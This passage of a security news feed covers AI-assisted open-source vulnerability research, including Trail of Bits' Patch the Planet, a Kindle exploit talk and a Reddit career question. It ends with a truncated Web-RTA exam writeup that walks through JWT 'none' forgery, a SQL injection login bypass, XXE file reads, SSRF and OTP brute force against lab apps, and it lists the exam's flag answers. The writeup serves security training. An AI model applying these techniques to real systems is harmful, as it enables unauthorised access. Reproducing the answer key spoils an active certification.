<p>The focus on open-source security follows incidents such as <a href="https://www.csoonline.com/article/1259949/lazarus-apt-attack-campaign-shows-log4shell-exploitation-remains-popular.html">Log4Shell</a> and the <a href="https://www.csoonline.com/article/2077692/dangerous-xz-utils-backdoor-was-the-result-of-years-long-supply-chain-compromise-effort.html">XZ Utils backdoor</a>, which showed how quickly a flaw in a shared component can move through enterprise software.</p>



<p>Analysts said Patch the Planet changes the risk equation only if enterprises treat AI-assisted vulnerability research as an input to a broader software supply chain risk program, not as a substitute for one.</p>



<p>“The key shift is speed: AI-assisted research can help find, validate, patch, test, and document issues faster, while human reviewers reduce false positives before maintainers are burdened,” said <a href="https://www.forrester.com/analyst-bio/biswajeet-mahapatra/BIO20046" target="_blank" rel="noreferrer noopener">Biswajeet Mahapatra</a>, principal analyst at Forrester. “But the dependency on scarce expertise does not go away; it moves to triage, exploitability judgment, patch safety, disclosure timing, and production rollout.”</p>



<h2 class="wp-block-heading">Guardrails before deployment</h2>



<p>CISOs should put governance controls in place before using AI-assisted vulnerability research in enterprise security pipelines, to ensure unverified findings do not overwhelm engineering teams, said <a href="https://www.linkedin.com/in/devashri-datta-522b364b/" target="_blank" rel="noreferrer noopener">Devashri Datta</a>, an open-source cybersecurity architect.</p>



<p>“CISOs should demand a Safety Relevance Layer in their risk modeling, a structured framework that requires every AI-generated finding to pass automated verification, including dynamic proof-of-concept validation and strong false-positive filtering, before it reaches a human analyst,” Datta said.</p>



<p>Those controls should also cover disclosure, particularly when AI tools identify flaws in third-party open-source components that the enterprise does not control, Datta said. Organizations need predefined escalation paths, notification timelines, and role assignments that take effect once a confirmed issue is found in an external dependency.</p>



<p>“Ad hoc disclosure in an AI-accelerated environment isn’t just a process gap; it’s a liability,” Datta said. “Trusting AI in the production pipeline requires verifiable auditability: organizations must be able to trace why the AI flagged a line of code, how it validated the exploit, and how it determined that the patch would not break downstream production systems.”</p>



<h2 class="wp-block-heading">Continuous exposure reduction</h2>



<p>AI-assisted vulnerability research could force enterprises to move away from periodic patching cycles and toward more continuous risk assessment, analysts said. If variant analysis and differential testing can be compressed from weeks to days, security teams may need faster ways to decide which findings matter most in their own environments.</p>



<p>That shift also means enterprises can no longer rely only on generic CVSS scores to prioritize remediation, Datta said. Findings will need to be assessed against the affected system, its business role, runtime exposure and the likelihood that a flaw can be exploited.</p>



<p>“We have to move toward context-aware, safety-critical prioritization,” Datta said. “Enterprise SBOM and VEX programs must evolve from passive compliance spreadsheets into live, machine-readable data feeds. For AI-assisted pipelines specifically, that means extending the VEX model to cover AI-introduced risk surfaces.”</p>



<p>Mahapatra said vulnerability management programs will also need to become more closely tied to software ownership, supplier response, and business impact.</p>



<p>“Security teams should move from periodic vulnerability handling to continuous exposure reduction,” Mahapatra said.</p>



<p>That means SBOMs should be treated as live inventories tied to runtime exposure and supplier response, rather than static compliance documents. Patch decisions should also account for asset criticality, exploitability, compensating controls, and business impact.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Call of Duty: Black Ops 7 Season 4 Reloaded challenges universe-accurate crossovers with new Nick Cage bundle alongside new content for all modes]]></title>
<description><![CDATA[Season 4 Reloaded for Call of Duty: Black Ops 7 goes live on June 25 with new content for multiplayer, Endgame, Zombies, and Warzone.]]></description>
<link>https://tsecurity.de/de/3616515/windows-tipps/call-of-duty-black-ops-7-season-4-reloaded-challenges-universe-accurate-crossovers-with-new-nick-cage-bundle-alongside-new-content-for-all-modes/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3616515/windows-tipps/call-of-duty-black-ops-7-season-4-reloaded-challenges-universe-accurate-crossovers-with-new-nick-cage-bundle-alongside-new-content-for-all-modes/</guid>
<pubDate>Mon, 22 Jun 2026 21:55:24 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Season 4 Reloaded for Call of Duty: Black Ops 7 goes live on June 25 with new content for multiplayer, Endgame, Zombies, and Warzone.]]></content:encoded>
</item>
<item>
<title><![CDATA[Introducing Patch the Planet]]></title>
<description><![CDATA[What happens when you clear dozens of Trail of Bits engineers’ schedules, pair them with every open-source maintainer they can contact, and unleash the latest frontier models like GPT-5.5-Cyber on critical open-source targets? Thanks to our partnership with OpenAI and its Daybreak initiative, we ...]]></description>
<link>https://tsecurity.de/de/3616197/it-security-nachrichten/introducing-patch-the-planet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3616197/it-security-nachrichten/introducing-patch-the-planet/</guid>
<pubDate>Mon, 22 Jun 2026 19:09:10 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>What happens when you clear dozens of Trail of Bits engineers’ schedules, pair them with every open-source maintainer they can contact, and unleash the latest frontier models like GPT-5.5-Cyber on critical open-source targets? Thanks to <a href="https://openai.com/index/daybreak-securing-the-world/">our partnership with OpenAI</a> and its Daybreak initiative, <a href="https://gist.github.com/patch-the-planet/69fd1aa925c8e73edea9e6e967043cbb">we can report</a> that the impact is hundreds of discovered bugs, 64 pull requests, and 51 issues filed across 19 projects (with many more still undergoing coordinated disclosure). That was just the first week of <a href="https://trailofbits.com/patch-the-planet">Patch the Planet</a>.</p>
<p>Frontier models like GPT-5.5-Cyber are producing a firehose of security findings, and already-stretched maintainers must sift through all of it to separate real vulnerabilities from plausible-sounding false positives. Patch the Planet is different: with our experts orchestrating and triaging findings, we handle the work of fixing and hardening the code alongside the people who maintain it.</p>
<p>The first week of Patch the Planet covered 19 projects across cryptography, networking, language infrastructure, and software supply chain. Among these 19 projects were cURL, NATS, pyca, Sigstore, aiohttp, the Go project, freenginx, Python and python.org, urllib3, PyPI, SimpleX, Valkey, and RustCrypto. Over 30 projects have joined the initiative so far, and we’re rapidly expanding it to include more; if you maintain an open-source project, <a href="https://trailofbits.com/patch-the-planet">apply to join</a>!</p>
<p>




 

 






 <figure>
 
 <img src="https://blog.trailofbits.com/2026/06/22/introducing-patch-the-planet/ptp-image-1.gif" alt="“Live look at the Trail of Bits engineering teams”" width="500" height="221" loading="lazy" decoding="async">
 <figcaption>Live look at the Trail of Bits engineering teams</figcaption>
 </figure>
</p>
<p>Anyone can file an issue, flex, and walk away. We showed up with the patches: 37 are already merged, and many more are in flight. These merges go beyond just fixing bugs: we’re adding new tests and fuzzing harnesses, CI security scanning, supply-chain tooling, correctness fixes, and features maintainers had been meaning to get to. The goal of Patch the Planet is to leave essential open-source projects measurably better off.</p>
<h2>We brought patches, not just bug reports</h2>
<p>We’re reporting public findings <a href="https://gist.github.com/patch-the-planet/69fd1aa925c8e73edea9e6e967043cbb">on GitHub</a>, including 64 total pull requests. We also filed 51 issues, 19 of which are already closed with a fix. This public tally undercounts the work, since several projects take reports through private channels like HackerOne, GitHub security advisories, mailing lists, and private forks, and most of these have not been released publicly yet.</p>
<p>What’s in those pull requests matters more than the count. At python.org, we added a CI workflow built on <a href="https://github.com/zizmorcore/zizmor">zizmor</a>, our open-source GitHub Actions auditor, fixed all of the issues it flagged, and integrated it into their CI. In RustCrypto, we contributed correctness fixes to the big-integer library that higher-level cryptography is built on, alongside genuine feature work in review: serde encoding support and HPKE DHKEM suite IDs. Other patches were plain engineering help: storage-accounting and service-restart fixes in SimpleX, a clearer admin-quarantine confirmation in PyPI’s Warehouse, and supply-chain improvements like SBOM sidecars for Python’s Windows artifacts. We will also be upstreaming many testing improvements and new testing campaigns. Arguably, our best contributions are not even bug or security fixes.</p>
<p>Keeping track of all of this is a bot we call Patchy. Patchy monitors every project, posts each new finding and merged patch to our Slack, and, for reasons we consider scientifically sound, reintroduces the common use of <a href="https://openai.com/index/where-the-goblins-came-from/">goblins, gremlins, and assorted creatures</a>. Here’s Patchy’s description of <a href="https://github.com/pyca/cryptography/pull/14933">an issue that has been patched</a>:</p>
<p>




 

 




 


 <figure>
 <img src="https://blog.trailofbits.com/2026/06/22/introducing-patch-the-planet/ptp-image-2_hu_d772e23377508832.webp" alt="“Patchy’s description of an issue that has been patched”" width="1200" height="329" loading="lazy" decoding="async">
 <figcaption>Patchy’s description of an issue that has been patched</figcaption>
 </figure>
</p>
<p>When a patch lands, Patchy celebrates with a triumphant <code>PATCHY HAPPY</code>. Making Patchy happy is really what drives us.</p>
<p>




 

 




 


 <figure>
 <img src="https://blog.trailofbits.com/2026/06/22/introducing-patch-the-planet/ptp-image-3_hu_5af72ac2534386fd.webp" alt="“Bug patched, Patchy happy”" width="1200" height="185" loading="lazy" decoding="async">
 <figcaption>Bug patched, Patchy happy</figcaption>
 </figure>
</p>
<h2>A few highlights from the week</h2>
<p>The week produced more than we can fit in this post, but here are some quick highlights.</p>
<p><strong>A fuzzing lab built in a day.</strong> Given a narrow goal (find remotely exploitable bugs) and no instructions on how, GPT-5.5-Cyber decided that reading the source of one of the most-reviewed C libraries in existence was a poor use of tokens. Instead, it stood up a full fuzzing lab in under a day: sanitizer and variant builds, a seed corpus drawn from existing tests, and harnesses across a dozen entry points. Instead of simply fuzzing exposed APIs, it successfully built a harness that injected operating system backpressure to identify novel issues by reaching previously unexplored buggy states. We estimate all of that effort likely would’ve taken one of our fuzzing experts two to three weeks to do manually. Just as important, it showed judgment about what to test, what to report (and not report), and where to find higher-impact findings. We’ll publish the full details in a standalone field report.</p>
<p><strong>A pipeline for variant testing historical CVEs built in a day</strong>. Codex was also adept at building simple but effective pipelines, such as the CVE variant analysis pipeline shown below. Codex’s <code>/goal</code> feature combined with frontier models like GPT-5.5-Cyber for this type of variant analysis produced novel issues with almost exclusively high-signal output.</p>
<p>




 

 




 


 <figure>
 <img src="https://blog.trailofbits.com/2026/06/22/introducing-patch-the-planet/ptp-image-4_hu_a106c2e464121abc.webp" alt="“Pipeline for historical CVE variant analysis”" width="1200" height="617" loading="lazy" decoding="async">
 <figcaption>Pipeline for historical CVE variant analysis</figcaption>
 </figure>
</p>
<p><strong>A release-pipeline improvement at python.org.</strong> We reported multiple security issues for <a href="http://python.org/">python.org</a>, including some issues closing a legacy-API authorization gap. But we’re most proud of the work that produced long-term improvements to python.org’s release infrastructure: the new zizmor CI scanning, tightened release-file and metadata validation, deletion scoping fixed so bulk operations can’t reach beyond their target, and release-tooling patches in review that quote remote command arguments, fail safely on partial uploads, and add SBOM sidecars.</p>
<p><strong>The aiohttp maintainers fixed their issues almost immediately.</strong> We privately reported a cluster of issues across aiohttp’s client and server paths, including cookies that could regain broader scope after a save and reload, digest credentials that could answer a challenge from the wrong origin, and resource limits that ran after attacker-controlled buffering rather than before. The maintainers authored and merged all eight fixes within hours, seven of them inside a single five-hour window. We were impressed and appreciate the maintainers’ prompt and collaborative work on these issues!</p>
<p><strong>Differentially testing major cryptographic libraries against each other.</strong> Many of our projects implement the same logic, protocols, and algorithms. In particular, multiple projects implement the same cryptographic algorithms and standards like X.509 certificates. Therefore, we used Codex to point these projects at each other, and identify any relevant behavioral differences. This proved to be a high-signal approach that uncovered several issues, including <a href="https://github.com/pyca/cryptography/pull/14933">this AES-GCM issue in PyCA</a> and several X.509 issues, which we plan to upstream to <a href="https://x509-limbo.com/"><code>x509-limbo</code></a>.</p>
<h2>Finding the bugs is now the easy part</h2>
<p>If it wasn’t already clear from the last several months of security news, this week makes one thing clear: the expensive part of security work has moved. Arming Codex with fuzzing campaigns, variant analysis, differential testing, agentic searching, and similar techniques produces real vulnerabilities and compresses weeks or months of manual effort into hours. The advantage is no longer in finding bugs, but everything after: confirming a finding, getting its severity right, writing a patch a maintainer will accept, hardening the surrounding code, making long-term improvements to prevent similar issues in the future, and coordinating a disclosure. That is the work that floods of AI-generated reports threaten to bury.</p>
<h2>Guidance for maintainers</h2>
<p>If you’re a maintainer managing an unsustainable number of AI-generated bug reports, the core challenges you need to solve are deduplication, false-positive filtering, and severity correction.</p>
<p>Deduplication is the easiest problem to solve technically. Even simple AI-based tools that compare new reports against open issues perform well, especially when grounded in affected code lines. Automating this step eliminates most of the noise.</p>
<p>False-positive filtering and severity correction are harder, but they can be managed. Without explicit guidance, models default to rating everything as critical.</p>
<p>




 

 




 


 <figure>
 <img src="https://blog.trailofbits.com/2026/06/22/introducing-patch-the-planet/ptp-image-5_hu_1b13148a17364cf7.webp" alt="“Patchy without threat model and severity guidance”" width="1200" height="1019" loading="lazy" decoding="async">
 <figcaption>Patchy without threat model and severity guidance</figcaption>
 </figure>
</p>
<p>Generic approaches like our <a href="https://github.com/trailofbits/skills/tree/main/plugins/fp-check">fp-check</a> tool help, but only to a point. The best improvements require project-specific documentation, threat models, and severity criteria. <a href="https://cryptography.io/en/latest/security/">PyCA’s security documentation</a>, for example, was dramatically effective at reducing false positives in our bug candidates. Files like <code>AGENTS.md</code> that explicitly tell models which documentation to consult produced the most consistent and effective results. If security researchers are armed with this documentation, especially <a href="http://agents.md/"><code>AGENTS.md</code></a> for AI-based research, more noise will be filtered out before reaching the maintainers.</p>
<h2>What’s next and how to get involved</h2>
<p>This was just our first week. Over 30 projects have committed to join Patch the Planet, with a growing waitlist. As more findings clear coordinated disclosure, we’ll publish more results and deeper field reports, including full fuzzing lab details, the variant-analysis and differential-testing pipelines, and the tooling we’re building to help maintainers triage AI-generated reports themselves. Our <a href="https://gist.github.com/patch-the-planet/69fd1aa925c8e73edea9e6e967043cbb">Patch the Planet gist</a> contains the full public list of our week one output.</p>
<p>




 

 






 <figure>
 
 <img src="https://blog.trailofbits.com/2026/06/22/introducing-patch-the-planet/ptp-image-6.gif" alt="“Join Patch the Planet and spread the word”" width="480" height="207" loading="lazy" decoding="async">
 <figcaption>Join Patch the Planet and spread the word</figcaption>
 </figure>
</p>
<p>If you maintain a critical open-source project and want this kind of help, you can <a href="https://trailofbits.com/patch-the-planet">apply to join Patch the Planet</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Black Hat Europe 2025 | Taking Over Your Amazon Account With A Kindle]]></title>
<description><![CDATA[Author: Black Hat - Bewertung: 3x - Views:32 Amazon's Kindle is the most popular e-reader on the market, with an extensive ecosystem of e-books. From a security perspective, Kindle devices especially stand out because they are often linked to an Amazon account.

Their complex software stack suppo...]]></description>
<link>https://tsecurity.de/de/3615748/it-security-video/black-hat-europe-2025-taking-over-your-amazon-account-with-a-kindle/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3615748/it-security-video/black-hat-europe-2025-taking-over-your-amazon-account-with-a-kindle/</guid>
<pubDate>Mon, 22 Jun 2026 16:18:30 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Black Hat - Bewertung: 3x - Views:32 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/YslYzj5f2es?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Amazon's Kindle is the most popular e-reader on the market, with an extensive ecosystem of e-books. From a security perspective, Kindle devices especially stand out because they are often linked to an Amazon account.<br />
<br />
Their complex software stack supports numerous e-book file formats (AZW, MOBI, PDF...), as well as many underlying media formats that increase the attack surface. As such, downloading an e-book from the store may allow an attacker to gain root access to the device, take control of the Amazon account, and steal credit card information.<br />
<br />
In this talk, we will dive into the internals of Kindle devices and discuss a $20,000 bug in the parsing of Audible audiobooks which allowed us to take full control of the e-reader. We will also share general insights on fuzzing file formats based on the MPEG-4 standard (ISOBMFF).<br />
<br />
By: Valentino Ricotta  |  Security Researcher, Thales<br />
<br />
https://blackhat.com/eu-25/briefings/schedule/?#dont-judge-an-audiobook-by-its-cover-taking-over-your-amazon-account-with-a-kindle-48836<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[need some real advice about my path..( Fuzzing and vulenrability research)]]></title>
<description><![CDATA[so wonderful people of this community.. i really need some suggestions and i would be greatful to honest ones..  so from way back i was interested into cybersec and i will not go into depth that much to keep this simple..  i am currently learning fuzzing and i can make harness and do root cause a...]]></description>
<link>https://tsecurity.de/de/3612859/malware-trojaner-viren/need-some-real-advice-about-my-path-fuzzing-and-vulenrability-research/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3612859/malware-trojaner-viren/need-some-real-advice-about-my-path-fuzzing-and-vulenrability-research/</guid>
<pubDate>Sun, 21 Jun 2026 01:03:02 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>so wonderful people of this community.. i really need some suggestions and i would be greatful to honest ones.. </p> <p>so from way back i was interested into cybersec and i will not go into depth that much to keep this simple.. </p> <p>i am currently learning fuzzing and i can make harness and do root cause analysis and crash tiage for simple targets..</p> <p>it was 2 yrs ago i started cybersecurity and initially i focused on fundamentals, later after learning some basic thigs like networking and some relavant knowledge i started learning penetration testing and i did that for 6 months or so but it was boring and i wanted to do something.. so i came across binary exploitation .. and i can't tell you all that how amazing it was.. so i started learning basics like assembly, gdb,ghidra,and other relavant knowldge i again gave some time and i solved reverse engineering challege.. i had no one to guide me and i was drifiting here and there so i asked chatgpt that if i can get a job or internship or not it said its hard and i should do something else like fuzzing and vulnerability research and i thought why not.. if it eventually takes me to my destination so.. i started learning it and after i learned some things like making a prover harness, code audit, making reports and i thought i should see if internship exist or not and i found none that i can do in upcoming winter..</p> <p>i am so disheartned by all this twist and turn.. can you please tell me what should be right approach what i should do that can help me.. i feel like quitting but i know i will regret it.. can you. please suggest me what i can look for and what should i learn in which order so i can get a real work </p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Emotional_writer_64"> /u/Emotional_writer_64 </a> <br> <span><a href="https://www.reddit.com/r/ExploitDev/comments/1uaznd2/need_some_real_advice_about_my_path_fuzzing_and/">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1uaznd2/need_some_real_advice_about_my_path_fuzzing_and/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Web-RTA Exam Writeup — Passed | CyberWarFare Labs]]></title>
<description><![CDATA[Certification: Web-RTA (Web Red Team Analyst)Issued by: CyberWarFare Labs (CWL)Difficulty: Beginner–IntermediateFormat: Practical, black-box, 16 flags across 2 web applicationsAuthor: Shikhali JamalzadeIntroductionThe Web-RTA (Web Red Team Analyst) certification by CyberWarFare Labs is a fully ha...]]></description>
<link>https://tsecurity.de/de/3610157/hacking/web-rta-exam-writeup-passed-cyberwarfare-labs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3610157/hacking/web-rta-exam-writeup-passed-cyberwarfare-labs/</guid>
<pubDate>Fri, 19 Jun 2026 13:09:28 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*qHO49GjzLkRCKuvKjxQ2kw.png"></figure><h4><strong>Certification:</strong> Web-RTA (Web Red Team Analyst)<br><strong>Issued by:</strong> CyberWarFare Labs (CWL)<br><strong>Difficulty:</strong> Beginner–Intermediate<br><strong>Format:</strong> Practical, black-box, 16 flags across 2 web applications<br><strong>Author:</strong> <a href="https://medium.com/u/20557ba7487d">Shikhali Jamalzade</a></h4><h3>Introduction</h3><p>The Web-RTA (Web Red Team Analyst) certification by CyberWarFare Labs is a fully hands-on, black-box web application penetration testing exam. No multiple choice, no theory — just two live web applications and 16 flags to capture.</p><p>The exam covers real-world web vulnerabilities: JWT attacks, SQL injection, XXE, SSRF, OAuth misconfigurations, and brute force. If you’ve worked through OWASP Top 10 and done some CTF-style web challenges, you’ll recognize the patterns immediately.</p><p>This writeup documents the complete attack chain I used to pass — step by step, flag by flag.</p><blockquote><em>⚠️ </em><strong><em>Disclaimer:</em></strong><em> This writeup is published after passing the exam. Exact flag values and credentials are not disclosed in full. The methodology is shared for educational purposes, as is standard practice in the security community.</em></blockquote><h3>Exam Structure</h3><ul><li>2 web application targets (separate IPs and ports)</li><li>16 total flags — mix of research questions and practical exploitation</li><li>30 days of lab access</li><li>Not proctored</li></ul><p>The first 4 flags are research-based (vulnerability names). The remaining 12 are practical — you earn them by actually exploiting the applications.</p><h3>Research Flags (Questions 1–4)</h3><p>Before touching either application, the exam starts with 4 vulnerability knowledge questions. These are straightforward if your web security fundamentals are solid:</p><ol><li><strong>Vulnerability that executes malicious queries in databases</strong> → SQLi</li><li><strong>Vulnerability that accesses other users’ data via manipulated object identifiers</strong> → IDOR</li><li><strong>Vulnerability that tricks a web app into making requests to internal/external resources</strong> → SSRF</li><li><strong>Vulnerability that injects malicious payloads into server-side templates to execute code</strong> → SSTI</li></ol><h3>WebApp 01</h3><h3>Reconnaissance</h3><p>Starting with the provided IP, the first step is directory enumeration:</p><p>bash</p><pre>feroxbuster -u http://&lt;WEBAPP01_IP&gt;:&lt;PORT&gt; -w /usr/share/wordlists/dirb/common.txt</pre><p>The root page redirects to a login page. Note the URL structure — the /dashboard endpoint will matter shortly.</p><h3>Flag 5 — Anonymous User Role</h3><p>Navigating to the login page, there’s a CAPTCHA + username/password form. Skip trying to brute force it for now.</p><p>Instead, go directly to /dashboard without logging in. The application loads and reveals your current role in the UI:</p><ul><li><strong>Flag 5:</strong> The role allocated to unauthenticated users → anonymous</li><li><strong>Flag 6:</strong> The endpoint where events are available → /dashboard</li></ul><h3>JWT Token Manipulation</h3><p>While on the dashboard as an anonymous user, open Burp Suite and inspect the cookies. There’s an access_token_cookie - paste it into jwt.io.</p><p>The decoded payload reveals:</p><p>json</p><pre>{<br>  "role": "anonymous",<br>  "username": "anonymous"<br>}</pre><p>The token uses algorithm: none - meaning there's no signature verification. This is a classic JWT vulnerability.</p><p>Modify the payload:</p><p>json</p><pre>{<br>  "role": "user",<br>  "username": "user"<br>}</pre><p>Remove the signature entirely (keep the trailing dot), update the cookie in your browser (Storage tab in DevTools or via Burp), and reload the page.</p><p>You’re now authenticated as a user-role account. The dashboard now shows an event:</p><h3>Flag 7 — Event Name</h3><p>The event visible to authenticated users:</p><ul><li><strong>Flag 7:</strong> Masquerade Ball</li></ul><h3>Flag 8 — Admin Username Discovery</h3><p>The event details show it was created by a specific user. That username is:</p><ul><li><strong>Flag 8:</strong> notatypicalsysadmin</li></ul><h3>SQL Injection — Admin Login Bypass</h3><p>Log out and return to the login page. Enter notatypicalsysadmin as the username. Leave the password empty for now - but fill in the CAPTCHA correctly first.</p><p><strong>Key insight:</strong> The application validates the CAPTCHA before checking credentials. If the CAPTCHA is correct, the response will confirm whether the username exists. This is an information disclosure vulnerability that lets you enumerate valid usernames.</p><p>Once you’ve confirmed the username is valid, exploit the SQL injection:</p><ul><li><strong>Flag 10:</strong> The value of the flag in WebApp 01 → flag (the username found in /etc/passwd)</li></ul><h3>Flags 11, 12 &amp; 13 — SSRF via Check Outage</h3><p>Click <strong>Check Outage → Check Our Status</strong>. The application makes an internal request and returns service health data. Observing the response, it’s hitting:</p><ul><li><strong>Flag 11:</strong> Internal URL for fetching secrets → <a href="http://127.0.0.1:8000/health">http://127.0.0.1:8000/health</a></li></ul><p>Now scroll down to the <strong>Fetch Status</strong> section. There’s a “Service URL” input field and a <strong>Fetch Secret</strong> button — a classic SSRF endpoint.</p><p><strong>Step 1:</strong> Enter http://127.0.0.1:8000 and submit. The server returns a 418 status code (I'm a teapot) - the service is alive but rejects plain requests.</p><p><strong>Step 2:</strong> URL-encode the target URL and resubmit:</p><pre>http%3A%2F%2F127.0.0.1%3A8000</pre><p>This time the server returns an encoded response with the label “hidden in layers”.</p><ul><li><strong>Flag 12:</strong> The encoded data returned → a hex-encoded Base64 string</li></ul><p><strong>Step 3:</strong> Decode it — it’s hex that, when decoded, gives Base64. Decode the Base64:</p><p>bash</p><pre>echo "&lt;hex_string&gt;" | xxd -r -p | base64 -d</pre><p>The final decoded output contains credentials: a username and password.</p><ul><li><strong>Flag 13:</strong> The plaintext version of “hidden in layers” → the decoded credentials (username:password pair)</li></ul><h3>WebApp 02</h3><h3>Reconnaissance</h3><p>Using the second IP provided, navigating to the root returns a 404. Time to enumerate:</p><p>bash</p><pre>feroxbuster -u http://&lt;WEBAPP02_IP&gt;:&lt;PORT&gt; -w /usr/share/wordlists/dirb/common.txt</pre><h3>Flag 14 — Login Endpoint Discovery</h3><p>Directory fuzzing reveals a non-standard login path:</p><ul><li><strong>Flag 14:</strong> WebApp 02 login endpoint → /client/login</li></ul><h3>Flag 15 — Client ID (IDOR)</h3><p>Use the credentials extracted from WebApp 01’s SSRF exploitation (the “hidden in layers” plaintext) to log into /client/login.</p><p>You’re now logged in as a client account. The application displays your Client ID:</p><ul><li><strong>Flag 15:</strong> Client ID allocated to the exfiltrated credentials → client_1337</li></ul><h3>OAuth Scope Manipulation + OTP Brute Force</h3><p>After logging in, explore the available permissions/scopes. Attempting to access elevated features returns a permission error. Intercept the authorization request in Burp Suite.</p><p>In the request, find the scope parameter - currently set to read. Change it to admin:</p><pre>scope=admin</pre><p>Forward the modified request. The application now shows admin-level scope — but requires an OTP (One-Time Password) to confirm the privilege escalation.</p><p><strong>The vulnerability:</strong> The application sends the same OTP code every time, making it trivially brute-forceable.</p><p>Send the OTP request to Burp Intruder:</p><ol><li>Mark the OTP field as the payload position</li><li>Set payload type: <strong>Numbers</strong></li><li>Range: 100–999 (3-digit OTP)</li><li>Start attack</li></ol><p>The correct OTP is identified by a different response (redirect or 200 instead of error). In the exam environment, the OTP was 176 - but this may vary per lab instance.</p><p>Once the OTP is confirmed:</p><ol><li>Copy the correct OTP</li><li>Go back to the application (not Burp)</li><li>Enter the OTP in the UI</li><li>Follow the redirect → Admin Dashboard</li></ol><p>Click <strong>Go to Admin Panel</strong>.</p><h3>Flag 16 — Bob’s Credit Card Number</h3><p>The admin panel contains sensitive user data. Navigating through the admin interface reveals a user named Bob with his financial information exposed:</p><ul><li><strong>Flag 16:</strong> Bob’s Credit Card number → <em>(found in admin panel user data)</em></li></ul><h3>Attack Chain Summary</h3><p><strong>WebApp 01</strong></p><pre>[Feroxbuster] → found /dashboard, /login<br>      ↓<br>[Anonymous dashboard] → role = "anonymous" (Flag 5)<br>                      → endpoint = /dashboard (Flag 6)<br>      ↓<br>[JWT cookie] → algorithm: none → change role to "user"<br>      ↓<br>[Authenticated dashboard] → event: "Masquerade Ball" (Flag 7)<br>                          → created by: notatypicalsysadmin (Flag 8)<br>      ↓<br>[Login page] → SQLi: notatypicalsysadmin' / ' OR 1=1-- → admin access<br>      ↓<br>[Update Event] → XXE → /etc/passwd → user "flag" (Flag 9, 10)<br>      ↓<br>[Check Outage] → internal URL: http://127.0.0.1:8000/health (Flag 11)<br>      ↓<br>[Fetch Status] → SSRF → URL encode → hex+Base64 response (Flag 12)<br>             → decode → plaintext credentials (Flag 13)</pre><p><strong>WebApp 02</strong></p><pre>[Feroxbuster] → /client/login (Flag 14)<br>      ↓<br>[Login] with SSRF creds → client_1337 (Flag 15)<br>      ↓<br>[OAuth scope] → change read → admin → OTP required<br>      ↓<br>[Burp Intruder] → brute force OTP → 176 → admin dashboard<br>      ↓<br>[Admin panel] → Bob's credit card number (Flag 16) ✅</pre><h3>All 16 Flags — Quick Reference</h3><ol><li><strong>DB query vulnerability</strong> → SQLi</li><li><strong>Object ID manipulation vulnerability</strong> → IDOR</li><li><strong>Internal request forgery vulnerability</strong> → SSRF</li><li><strong>Server-side template injection</strong> → SSTI</li><li><strong>Unauthenticated user role</strong> → anonymous</li><li><strong>Events endpoint</strong> → /dashboard</li><li><strong>Event name (authenticated)</strong> → Masquerade Ball</li><li><strong>Admin username</strong> → notatypicalsysadmin</li><li><strong>File path containing “flag”</strong> → /etc/passwd</li><li><strong>Flag value in file system</strong> → flag (user in /etc/passwd)</li><li><strong>Internal URL for secrets</strong> → <a href="http://127.0.0.1:8000/health">http://127.0.0.1:8000/health</a></li><li><strong>Encoded SSRF response</strong> → hex-encoded Base64 string</li><li><strong>Decoded “hidden in layers”</strong> → plaintext credentials</li><li><strong>WebApp 02 login endpoint</strong> → /client/login</li><li><strong>Client ID</strong> → client_1337</li><li><strong>Bob’s credit card</strong> → found in admin panel</li></ol><h3>Tools Used</h3><ul><li><strong>feroxbuster</strong> — Directory and endpoint enumeration</li><li><strong>Burp Suite</strong> — Request interception, modification, Intruder</li><li><strong>jwt.io</strong> — JWT token decoding and manipulation</li><li><strong>curl</strong> — Manual request crafting</li><li><strong>xxd + base64</strong> — Multi-layer decoding</li></ul><h3>Key Lessons Learned</h3><p><strong>1. Always check JWT algorithm first.</strong><br> none algorithm is a well-known vulnerability but still appears in real applications. Check jwt.io immediately whenever you see a JWT cookie.</p><p><strong>2. CAPTCHA bypass ≠ brute force.</strong><br> The CAPTCHA here wasn’t bypassed — it was used strategically. Solving it correctly to enumerate valid usernames, then using SQLi for the actual bypass, is cleaner than fighting the CAPTCHA itself.</p><p><strong>3. Multi-layer encoding is intentional.</strong><br> The hex → Base64 → plaintext chain in the SSRF response is designed to make you think before you decode. Know your encoding formats: hex, Base64, URL encoding.</p><p><strong>4. OAuth scope parameters are user-controlled.</strong><br> Never trust client-side scope values. Changing read to admin in a request shouldn't work - but it does in misconfigured systems. Always test scope escalation in OAuth flows.</p><p><strong>5. OTP brute force only works if the OTP doesn’t change.</strong><br> The application’s fatal flaw was issuing the same OTP code repeatedly. In a secure implementation, OTPs expire and change with each request. This is a real-world vulnerability class, not just a CTF trick.</p><h3>Final Thoughts</h3><p>Web-RTA is a solid entry-level web security certification. The attack chain is realistic — JWT manipulation, SQLi, XXE, SSRF, and OAuth abuse are all vulnerabilities you’ll encounter in real bug bounty targets and penetration tests.</p><p>It’s not the hardest exam. But it tests whether you can chain vulnerabilities together under a black-box scenario — and that skill is what separates someone who’s memorized OWASP Top 10 from someone who can actually exploit it.</p><p>If you’re preparing: be comfortable with Burp Suite, 